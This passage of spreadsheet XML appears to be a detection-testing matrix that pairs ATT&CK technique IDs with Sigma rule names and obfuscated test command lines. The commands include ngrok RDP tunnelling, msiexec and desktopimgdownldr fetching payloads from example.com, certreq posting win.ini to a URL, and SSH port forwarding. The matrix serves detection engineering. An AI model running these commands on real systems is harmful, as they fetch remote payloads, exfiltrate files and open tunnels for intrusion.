      <c r="J704" s="43" t="n"/>
      <c r="K704" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="705" ht="15.75" customHeight="1" s="42">
      <c r="A705" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B705" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C705" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D705" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E705" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "ngrok.exe t^c^p 3389"</t>
        </is>
      </c>
      <c r="F705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I705" s="43" t="n"/>
      <c r="J705" s="43" t="n"/>
      <c r="K705" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="706" ht="15.75" customHeight="1" s="42">
      <c r="A706" s="41" t="n"/>
      <c r="B706" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C706" s="41" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D706" s="41" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E706" s="41" t="n"/>
      <c r="F706" s="41" t="n"/>
      <c r="G706" s="41" t="n"/>
      <c r="H706" s="41" t="n"/>
      <c r="I706" s="41" t="n"/>
      <c r="J706" s="41" t="n"/>
      <c r="K706" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="707" ht="15.75" customHeight="1" s="42">
      <c r="A707" s="41" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B707" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C707" s="41" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D707" s="41" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E707" s="41" t="n"/>
      <c r="F707" s="41" t="n"/>
      <c r="G707" s="41" t="n"/>
      <c r="H707" s="41" t="n"/>
      <c r="I707" s="41" t="n"/>
      <c r="J707" s="41" t="n"/>
      <c r="K707" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="708" ht="15.75" customHeight="1" s="42">
      <c r="A708" s="41" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B708" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C708" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D708" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E708" s="41" t="n"/>
      <c r="F708" s="41" t="n"/>
      <c r="G708" s="41" t="n"/>
      <c r="H708" s="41" t="n"/>
      <c r="I708" s="41" t="n"/>
      <c r="J708" s="41" t="n"/>
      <c r="K708" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="709" ht="15.75" customHeight="1" s="42">
      <c r="A709" s="41" t="n"/>
      <c r="B709" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_plink_port_forwarding</t>
        </is>
      </c>
      <c r="C709" s="41" t="inlineStr">
        <is>
          <t>Suspicious Plink Port Forwarding</t>
        </is>
      </c>
      <c r="D709" s="41" t="inlineStr">
        <is>
          <t>48a61b29-389f-4032-b317-b30de6b95314</t>
        </is>
      </c>
      <c r="E709" s="41" t="n"/>
      <c r="F709" s="41" t="n"/>
      <c r="G709" s="41" t="n"/>
      <c r="H709" s="41" t="n"/>
      <c r="I709" s="41" t="n"/>
      <c r="J709" s="41" t="n"/>
      <c r="K709" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="710" ht="15.75" customHeight="1" s="42">
      <c r="A710" s="41" t="inlineStr">
        <is>
          <t>t1132.001</t>
        </is>
      </c>
      <c r="B710" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_decode_gzip</t>
        </is>
      </c>
      <c r="C710" s="41" t="inlineStr">
        <is>
          <t>Gzip Archive Decode Via PowerShell</t>
        </is>
      </c>
      <c r="D710" s="41" t="inlineStr">
        <is>
          <t>98767d61-b2e8-4d71-b661-e36783ee24c1</t>
        </is>
      </c>
      <c r="E710" s="41" t="n"/>
      <c r="F710" s="41" t="n"/>
      <c r="G710" s="41" t="n"/>
      <c r="H710" s="41" t="n"/>
      <c r="I710" s="41" t="n"/>
      <c r="J710" s="41" t="n"/>
      <c r="K710" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="711" ht="15.75" customHeight="1" s="42">
      <c r="A711" s="41" t="n"/>
      <c r="B711" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_com_cradles</t>
        </is>
      </c>
      <c r="C711" s="41" t="inlineStr">
        <is>
          <t>Potential COM Objects Download Cradles Usage - Process Creation</t>
        </is>
      </c>
      <c r="D711" s="41" t="inlineStr">
        <is>
          <t>02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf</t>
        </is>
      </c>
      <c r="E711" s="41" t="n"/>
      <c r="F711" s="41" t="n"/>
      <c r="G711" s="41" t="n"/>
      <c r="H711" s="41" t="n"/>
      <c r="I711" s="41" t="n"/>
      <c r="J711" s="41" t="n"/>
      <c r="K711" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="15.75" customHeight="1" s="42">
      <c r="A712" s="41" t="n"/>
      <c r="B712" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_frombase64string_archive</t>
        </is>
      </c>
      <c r="C712" s="41" t="inlineStr">
        <is>
          <t>Suspicious FromBase64String Usage On Gzip Archive - Process Creation</t>
        </is>
      </c>
      <c r="D712" s="41" t="inlineStr">
        <is>
          <t>d75d6b6b-adb9-48f7-824b-ac2e786efe1f</t>
        </is>
      </c>
      <c r="E712" s="41" t="n"/>
      <c r="F712" s="41" t="n"/>
      <c r="G712" s="41" t="n"/>
      <c r="H712" s="41" t="n"/>
      <c r="I712" s="41" t="n"/>
      <c r="J712" s="41" t="n"/>
      <c r="K712" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="713" ht="15.75" customHeight="1" s="42">
      <c r="A713" s="41" t="n"/>
      <c r="B713" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_rdp_tunneling</t>
        </is>
      </c>
      <c r="C713" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH</t>
        </is>
      </c>
      <c r="D713" s="41" t="inlineStr">
        <is>
          <t>f7d7ebd5-a016-46e2-9c54-f9932f2d386d</t>
        </is>
      </c>
      <c r="E713" s="41" t="n"/>
      <c r="F713" s="41" t="n"/>
      <c r="G713" s="41" t="n"/>
      <c r="H713" s="41" t="n"/>
      <c r="I713" s="41" t="n"/>
      <c r="J713" s="41" t="n"/>
      <c r="K713" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="714" ht="15.75" customHeight="1" s="42">
      <c r="A714" s="41" t="n"/>
      <c r="B714" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssm_agent_abuse</t>
        </is>
      </c>
      <c r="C714" s="41" t="inlineStr">
        <is>
          <t>Potential Amazon SSM Agent Hijacking</t>
        </is>
      </c>
      <c r="D714" s="41" t="inlineStr">
        <is>
          <t>d20ee2f4-822c-4827-9e15-41500b1fff10</t>
        </is>
      </c>
      <c r="E714" s="41" t="n"/>
      <c r="F714" s="41" t="n"/>
      <c r="G714" s="41" t="n"/>
      <c r="H714" s="41" t="n"/>
      <c r="I714" s="41" t="n"/>
      <c r="J714" s="41" t="n"/>
      <c r="K714" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="715" ht="15.75" customHeight="1" s="42">
      <c r="A715" s="41" t="n"/>
      <c r="B715" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C715" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D715" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E715" s="41" t="n"/>
      <c r="F715" s="41" t="n"/>
      <c r="G715" s="41" t="n"/>
      <c r="H715" s="41" t="n"/>
      <c r="I715" s="41" t="n"/>
      <c r="J715" s="41" t="n"/>
      <c r="K715" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="716" ht="15.75" customHeight="1" s="42">
      <c r="A716" s="41" t="inlineStr">
        <is>
          <t>t1608</t>
        </is>
      </c>
      <c r="B716" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C716" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D716" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E716" s="41" t="n"/>
      <c r="F716" s="41" t="n"/>
      <c r="G716" s="41" t="n"/>
      <c r="H716" s="41" t="n"/>
      <c r="I716" s="41" t="n"/>
      <c r="J716" s="41" t="n"/>
      <c r="K716" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="717" ht="15.75" customHeight="1" s="42">
      <c r="A717" s="41" t="n"/>
      <c r="B717" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_remote_shell_</t>
        </is>
      </c>
      <c r="C717" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Shell Execution</t>
        </is>
      </c>
      <c r="D717" s="41" t="inlineStr">
        <is>
          <t>f4a623c2-4ef5-4c33-b811-0642f702c9f1</t>
        </is>
      </c>
      <c r="E717" s="41" t="n"/>
      <c r="F717" s="41" t="n"/>
      <c r="G717" s="41" t="n"/>
      <c r="H717" s="41" t="n"/>
      <c r="I717" s="41" t="n"/>
      <c r="J717" s="41" t="n"/>
      <c r="K717" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="718" ht="15.75" customHeight="1" s="42">
      <c r="A718" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B718" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C718" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D718" s="41" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E718" s="41" t="inlineStr">
        <is>
          <t>findstr.exe "-v" "-l" "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F718" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G718" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H718" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I718" s="41" t="n"/>
      <c r="J718" s="41" t="n"/>
      <c r="K718" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="719" ht="15.75" customHeight="1" s="42">
      <c r="A719" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B719" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C719" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D719" s="41" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E719" s="41" t="inlineStr">
        <is>
          <t>findstr.exe	/v	/l	"TEST-HOST"	\\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F719" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G719" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H719" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I719" s="41" t="n"/>
      <c r="J719" s="41" t="n"/>
      <c r="K719" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="720" ht="15.75" customHeight="1" s="42">
      <c r="A720" s="41" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B720" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C720" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D720" s="41" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E720" s="41" t="inlineStr">
        <is>
          <t>findstr.exe /vl "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F720" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G720" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H720" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I720" s="41" t="n"/>
      <c r="J720" s="41" t="n"/>
      <c r="K720" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="721" ht="15.75" customHeight="1" s="42">
      <c r="A721" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B721" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_remote_file_download</t>
        </is>
      </c>
      <c r="C721" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Desktopimgdownldr Utility</t>
        </is>
      </c>
      <c r="D721" s="41" t="inlineStr">
        <is>
          <t>214641c2-c579-4ecb-8427-0cf19df6842e</t>
        </is>
      </c>
      <c r="E721" s="41" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe -lockscreenurl:http://example.com/payload.png</t>
        </is>
      </c>
      <c r="F721" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G721" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H721" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I721" s="41" t="n"/>
      <c r="J721" s="41" t="n"/>
      <c r="K721" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="722" ht="15.75" customHeight="1" s="42">
      <c r="A722" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B722" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_remote_file_download</t>
        </is>
      </c>
      <c r="C722" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Desktopimgdownldr Utility</t>
        </is>
      </c>
      <c r="D722" s="41" t="inlineStr">
        <is>
          <t>214641c2-c579-4ecb-8427-0cf19df6842e</t>
        </is>
      </c>
      <c r="E722" s="41" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe "/lockscreenurl":http://example.com/payload.png</t>
        </is>
      </c>
      <c r="F722" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G722" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H722" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I722" s="41" t="n"/>
      <c r="J722" s="41" t="n"/>
      <c r="K722" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="723" ht="15.75" customHeight="1" s="42">
      <c r="A723" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B723" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_remote_file_download</t>
        </is>
      </c>
      <c r="C723" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Desktopimgdownldr Utility</t>
        </is>
      </c>
      <c r="D723" s="41" t="inlineStr">
        <is>
          <t>214641c2-c579-4ecb-8427-0cf19df6842e</t>
        </is>
      </c>
      <c r="E723" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c desktopimgdownldr.exe /locksc^reenurl:http://example.com/payload.png</t>
        </is>
      </c>
      <c r="F723" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G723" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H723" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I723" s="41" t="n"/>
      <c r="J723" s="41" t="n"/>
      <c r="K723" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="724" ht="15.75" customHeight="1" s="42">
      <c r="A724" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B724" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_desktopimgdownldr_remote_file_download</t>
        </is>
      </c>
      <c r="C724" s="41" t="inlineStr">
        <is>
          <t>Remote File Download Via Desktopimgdownldr Utility</t>
        </is>
      </c>
      <c r="D724" s="41" t="inlineStr">
        <is>
          <t>214641c2-c579-4ecb-8427-0cf19df6842e</t>
        </is>
      </c>
      <c r="E724" s="41" t="inlineStr">
        <is>
          <t>desktopimgdownldr.exe /lockscreenurl:h"tt"p://example.com/payload.png</t>
        </is>
      </c>
      <c r="F724" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G724" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H724" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I724" s="41" t="n"/>
      <c r="J724" s="41" t="n"/>
      <c r="K724" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="725" ht="15.75" customHeight="1" s="42">
      <c r="A725" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B725" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C725" s="41" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D725" s="41" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E725" s="41" t="inlineStr">
        <is>
          <t>certreq.exe "-Post" "-config" https://example.com c:\windows\win.ini C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F725" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G725" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H725" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I725" s="41" t="n"/>
      <c r="J725" s="41" t="n"/>
      <c r="K725" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="726" ht="15.75" customHeight="1" s="42">
      <c r="A726" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B726" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C726" s="41" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D726" s="41" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E726" s="41" t="inlineStr">
        <is>
          <t>certreq.exe -Post -config https://example.com c:\windows\.\win.ini C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F726" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G726" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H726" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I726" s="41" t="n"/>
      <c r="J726" s="41" t="n"/>
      <c r="K726" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="727" ht="15.75" customHeight="1" s="42">
      <c r="A727" s="41" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B727" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C727" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D727" s="41" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E727" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\cloudflared.exe tunnel "cleanup" -connector-id 99999999-8888-7777-6666-555555555555</t>
        </is>
      </c>
      <c r="F727" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G727" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H727" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I727" s="41" t="n"/>
      <c r="J727" s="41" t="n"/>
      <c r="K727" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="728" ht="15.75" customHeight="1" s="42">
      <c r="A728" s="41" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B728" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C728" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D728" s="41" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E728" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\cloudflared.exe tunnel	cleanup	-connector-id 99999999-8888-7777-6666-555555555555</t>
        </is>
      </c>
      <c r="F728" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G728" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H728" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I728" s="41" t="n"/>
      <c r="J728" s="41" t="n"/>
      <c r="K728" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="729" ht="15.75" customHeight="1" s="42">
      <c r="A729" s="41" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B729" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C729" s="41" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D729" s="41" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E729" s="41" t="inlineStr">
        <is>
          <t>msiexec.exe /i http:\\example.com\test.msi</t>
        </is>
      </c>
      <c r="F729" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G729" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H729" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I729" s="41" t="n"/>
      <c r="J729" s="41" t="n"/>
      <c r="K729" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="730" ht="15.75" customHeight="1" s="42">
      <c r="A730" s="41" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B730" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C730" s="41" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D730" s="41" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E730" s="41" t="inlineStr">
        <is>
          <t>msiexec.exe /i "http://example.com/test.msi"</t>
        </is>
      </c>
      <c r="F730" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G730" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H730" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I730" s="41" t="n"/>
      <c r="J730" s="41" t="n"/>
      <c r="K730" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="731" ht="15.75" customHeight="1" s="42">
      <c r="A731" s="41" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B731" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C731" s="41" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D731" s="41" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E731" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\System32\msiexec.exe /i http://example.com/test.msi</t>
        </is>
      </c>
      <c r="F731" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G731" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H731" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I731" s="41" t="n"/>
      <c r="J731" s="41" t="n"/>
      <c r="K731" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="732" ht="15.75" customHeight="1" s="42">
      <c r="A732" s="41" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B732" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_web_install</t>
        </is>
      </c>
      <c r="C732" s="41" t="inlineStr">
        <is>
          <t>MsiExec Web Install</t>
        </is>
      </c>
      <c r="D732" s="41" t="inlineStr">
        <is>
          <t>f7b5f842-a6af-4da5-9e95-e32478f3cd2f</t>
        </is>
      </c>
      <c r="E732" s="41" t="inlineStr">
        <is>
          <t>msiexec.exe	/i	http://example.com/test.msi</t>
        </is>
      </c>
      <c r="F732" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G732" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H732" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I732" s="41" t="n"/>
      <c r="J732" s="41" t="n"/>
      <c r="K732" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="733" ht="15.75" customHeight="1" s="42">
      <c r="A733" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B733" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_rdp_tunneling</t>
        </is>
      </c>
      <c r="C733" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH</t>
        </is>
      </c>
      <c r="D733" s="41" t="inlineStr">
        <is>
          <t>f7d7ebd5-a016-46e2-9c54-f9932f2d386d</t>
        </is>
      </c>
      <c r="E733" s="41" t="inlineStr">
        <is>
          <t>ssh.exe -L 1234:127.0.0.1:"3389" user@remote-host</t>
        </is>
      </c>
      <c r="F733" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G733" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H733" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I733" s="41" t="n"/>
      <c r="J733" s="41" t="n"/>
      <c r="K733" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="734" ht="15.75" customHeight="1" s="42">
      <c r="A734" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B734" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_rdp_tunneling</t>
        </is>
      </c>
      <c r="C734" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH</t>
        </is>
      </c>
      <c r="D734" s="41" t="inlineStr">
        <is>
          <t>f7d7ebd5-a016-46e2-9c54-f9932f2d386d</t>
        </is>
      </c>
      <c r="E734" s="41" t="inlineStr">
        <is>
          <t>ssh.exe -L 1234:127.0.0.1:03389 user@remote-host</t>
        </is>
      </c>
      <c r="F734" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G734" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H734" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I734" s="41" t="n"/>
      <c r="J734" s="41" t="n"/>
      <c r="K734" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="735" ht="15.75" customHeight="1" s="42">
      <c r="A735" s="41" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B735" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_rdp_tunneling</t>
        </is>
      </c>
      <c r="C735" s="41" t="inlineStr">
        <is>
          <t>Potential RDP Tunneling Via SSH</t>
        </is>
      </c>
      <c r="D735" s="41" t="inlineStr">
        <is>
          <t>f7d7ebd5-a016-46e2-9c54-f9932f2d386d</t>
        </is>
      </c>
      <c r="E735" s="41" t="inlineStr">
        <is>
          <t>ssh.exe -o "LocalForward 1234 127.0.0.1 3389" user@remote-host</t>
        </is>
      </c>
      <c r="F735" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G735" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H735" s="41" t="b">
        <v>1</v>
      </c>
      <c r="I735" s="41" t="n"/>
      <c r="J735" s="41" t="n"/>
      <c r="K735" s="41" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="736" ht="15.75" customHeight="1" s="42">
      <c r="A736" s="41" t="inlineStr">
        <is>
          <t>t1071.001</t>
        </is>
      </c>
      <c r="B736" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_tunnel_remote_shell_</t>
        </is>
      </c>
      <c r="C736" s="41" t="inlineStr">
        <is>
          <t>Visual Studio Code Tunnel Shell Execution</t>
        </is>
      </c>
      <c r="D736" s="41" t="inlineStr">
        <is>
          <t>f4a623c2-4ef5-4c33-b811-0642f702c9f1</t>
        </is>
      </c>
      <c r="E736" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoExit -Command "&amp; 'C:\Program Files\Microsoft VS Code\resources\app\out\vs\workbench\contrib\terminal\browser\media""shellIntegration.ps1""'"</t>
        </is>
      </c>
      <c r="F736" s="41" t="b">
        <v>1</v>
      </c>
